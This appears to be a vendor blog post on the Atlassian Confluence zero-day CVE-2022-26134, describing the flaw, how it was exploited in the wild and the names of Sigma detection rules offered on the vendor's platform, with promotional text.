CVE-2022-26134 Detection: Atlassian Confluence Zero-Day Vulnerability

Adversaries launch headline-making attacks against vulnerable Confluence Servers worldwide. Atlassian alerts their users to the security risks associated with an RCE flaw detected in all supported versions of Confluence (Server and Data Center). The bug is tracked as CVE-2022-26134, with the vendor rating it to be of the highest severity level. As of the 3d of June 2022, there are no patches to fix this vulnerability in Atlassian’s corporate wiki.

Detect CVE-2022-26134

To prevent this zero-day exploit from causing any significant damage to your system, utilize the following Sigma rules released by a team of keen threat hunting engineers from SOC Prime:

Possible Execution by Post Exploitation Activity from CVE-2022-26134 Vulnerability (via cmdline)

Possible OS Command Injections Patterns (via web)

Suspicious Java Child Process (via cmdline)

One more rule kit from 2020 that our security analysts deem useful:

Possible OS Command Injections Patterns (via web)

Non-registered users can browse through the collection of Sigma rules available via Search Engine – a one-stop shop for threat intelligence and SOC content. Press the Drill Down to Search Engine button to take your detection routine to the next level.

Another option that unlocks more possibilities is to register to the SOC Prime Platform and get a free Community subscription plan. Hit the View in SOC Prime Platform button to access an exhaustive collection of detection algorithms for multiple zero-day vulnerabilities aligned with 25+ SIEM, EDR, and XDR solutions.

View in SOC Prime Platform Drill Down to Search Engine

CVE-2022-26134 Description

The vulnerability in Confluence was first spotted by Volexity just recently, over a Memorial Day weekend. According to the researchers, threat actors leveraged the zero-day injection vulnerability to acquire full system access and plant the Behinder web shell for further malicious actions.

Due to the lack of a patch, Atlassian recommends that administrators ban external access to Confluence servers. Currently, there is no data on cloud-hosted servers being affected by this security hole.

Last August, the company disclosed another critical bug in its product that allowed unauthenticated users to execute arbitrary code on devices with Confluence Server or Confluence Data Center installed. The injection flaw was assigned CVE-2021-26084.

SOC Prime continuously broadens support for security analytics tools & technologies, enriching the detection capabilities for next-generation SIEM, EDR, and XDR platforms, and ensuring future-proof and cost-efficient solutions for SOC professionals worldwide. Learn more about what we have to offer to drive better detection.